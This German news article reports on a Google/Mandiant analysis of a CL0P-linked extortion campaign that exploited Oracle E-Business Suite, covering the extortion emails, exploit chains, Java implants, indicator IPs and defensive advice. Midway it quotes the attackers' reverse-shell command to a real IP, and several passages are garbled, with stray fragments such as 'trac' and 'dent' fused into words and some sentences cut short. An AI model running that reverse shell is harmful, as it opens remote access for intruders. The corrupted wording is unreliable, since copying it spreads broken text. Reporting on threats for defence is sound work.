Google meldet, dass „massenhafte Mengen an Kundendaten“ in einer Erpressungskampagne missbraucht wurden

Google hat einen groß angelegtentracvon Kundendaten durch mutmaßliche Täter gemeldet, die in ein Erpressungsnetzwerk verwickelt sein sollen. Google Threat Intelligence und Mandiant tracdie Angreifer, die möglicherweise mit der Erpressungsgruppe CL0P in Verbindung stehen, identifizieren.

Googles Threat Intelligence Group (GTIG) und Mandiant haben eine umfangreiche Erpressungskampagne aufgedeckt, die Sicherheitslücken in Oracles E-Business Suite (EBS) ausnutzt. Im Zuge dieser Kampagne wurden große Mengen an Kundendaten gestohlen. Die Operation begann laut GTIG am 29. September 2025 und wird von einer Gruppe durchgeführt, die Verbindungen zur Erpressungsmarke CL0P angibt.

Google und Mandiant decken Zero-Day-Schwachstelle auf 

Laut Googles Bericht verschickten die Angreifer eine „hohe Anzahl“ von E-Mails an Führungskräfte in verschiedenen Organisationen, in denen sie behaupteten, in deren Oracle EBS-Umgebungen eingedrungen zu sein, und drohten, gestohlene Daten zu veröffentlichen, falls kein Lösegeld gezahlt würde. 

Die E-Mails, die von Hunderten kompromittierter Drittanbieterkonten verschickt wurden, enthielten Kontaktadressen, [email protected] und [email protected], die zuvor mit der CL0P-Datenleckseite in Verbindung gebracht wurden.

Die gemeinsame Untersuchung von Google und Mandiant ergab, dass die Ausnutzungsaktivitäten bis in den Juli 2025 zurückreichen und möglicherweise mit einer Zero-Day-Schwachstelle zusammenhängen, die nun unter CVE-2025-61882 trac. In einigen Fällen sollen die Angreifer „erhebliche Datenmengen“ von betroffenen Organisationen erbeutet haben.

Oracle gab an, die ausgenutzten Sicherheitslücken seien im Juli behoben worden, veröffentlichte jedoch am 4. Oktober Notfall-Updates, um weitere Schwachstellen zu beheben. Oracle riet seinen Kunden dringend, die neuesten kritischen Patches zu installieren und betonte, dass die Aktualisierung aller Patches unerlässlich sei, um Sicherheitslücken zu vermeiden.

Die Erpressungsmarke CL0P ist seit 2020 aktiv und steht in Verbindung mit der Cyberkriminellen-Gruppe FIN11. Sie hat es zuvor auf Managed-File-Transfer-Systeme wie MOVEit, GoAnywhere und Accellion FTA abgesehen. Diese Kampagnen folgten einem ähnlichen Muster: massenhafte Ausnutzung von Zero-Day-Schwachstellen, Diebstahl sensibler Daten und Erpressung Wochen später. 

Zum Zeitpunkt der Veröffentlichung des Berichtskeine neuen Opfer dieses Vorfallsdent waren auf der Datenleckseite von CL0P 

Komplexe, mehrstufige Java-Implantate

Google und Mandiant zeigt, dass die Angreifer mehrere Exploit-Ketten nutzten, die auf Oracle EBS-Komponenten wie UiServlet und SyncServlet abzielten, um Remote-Code auszuführen und mehrstufige Java-Implantate einzuschleusen.

Im Juli 2025 wurden verdächtige Aktivitäten im Zusammenhang mit HTTP-Anfragen an /OA_HTML/configurator/UiServlet festgestellt. Diese verdächtigen Aktivitäten wurden in einem anderen Exploit beobachtet, der später in einer Telegram-Gruppe namens „SCATTERED LAPSUS$ HUNTERS“ auftauchte 

Der durchgesickerte Exploit nutzte mehrere fortgeschrittene Techniken, um die Kontrolle über die anvisierten Server zu erlangen, wie etwa Server-Side Request Forgery (SSRF), Authentifizierungsumgehung und XSL Template Injection.

Bis August 2025 begannen die Angreifer, ein weiteres Tool namens SyncServlet zu verwenden, um schädliche Templates in der EBS-Datenbank zu erstellen und auszuführen. Diese Templates enthielten Base64-kodierte XSL-Payloads, die Java-basierte Malware direkt in den Speicher luden. 

Unter dendentImplantaten befanden sich GOLDVEIN.JAVA, ein Downloader, der Nutzdaten der zweiten Stufe von vom Angreifer kontrollierten Kommandoservern abrief, und eine mehrschichtige Kette namens SAGE, die persistente Java-Servlet-Filter zur weiteren Ausnutzung installierte.

Nach dem Eindringen in das System nutzten die Angreifer das EBS-Konto „applmgr“, um das System zu erkunden, Netzwerk- und Systemdetails zu sammeln und anschließend weitere Schadsoftware zu installieren. Die Angreifer verwendeten außerdem Shell-Befehle wie ip addr, netstat -an und bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

Bei Ausnutzungsversuchen wurden die IP-Adressen 200.107.207.26 und 161.97.99.49dent, während 162.55.17.215:443 und 104.194.11.200:443 als Command-and-Control-Server für die GOLDVEIN.JAVA-Payload aufgeführt wurden.

GTIG hat die Operation noch keiner bekannten Gruppe formell zugeordnet, aber die Kampagne weist Ähnlichkeiten mit FIN11 auf, einer finanziell motivierten Cyberkriminalitätsgruppe, die zuvor mit CL0P-Ransomware und groß angelegten Datendiebstahloperationen in Verbindung gebracht wurde. 

Mandiant wies außerdem darauf hin, dass eines der kompromittierten Konten, das zum Versenden der Erpressungsmails verwendet wurde, bereits bei früheren FIN11-bezogenen Angriffen zum Einsatz gekommen war.

Benutzer werden dringend gebeten, gegenüber EBS-Datenbanktabellen XDO_TEMPLATES_B und XDO_LOBS, insbesondere solchen, deren Namen mit „TMP“ oder „DEF“ beginnen, misstrauisch zu sein und den externen Internetverkehr von EBS-Servern zu blockieren, um weitere Datenerpressungen zu verhindern.

Die Organisationen empfehlen außerdem, HTTP-Anfragen an Endpunkte wie /OA_HTML/SyncServlet und /OA_HTML/configurator/UiServlet genau zu überwachen und Speicherabbilder auf Hinweise auf im Speicher befindliche Java-Nutzdaten zu analysieren.

Google warnte davor, dass mit CL0P verbundene Gruppen mit ziemlicher Sicherheit weiterhin ihre Ressourcen darauf verwenden werden, Zero-Day-Exploits zu erlangen.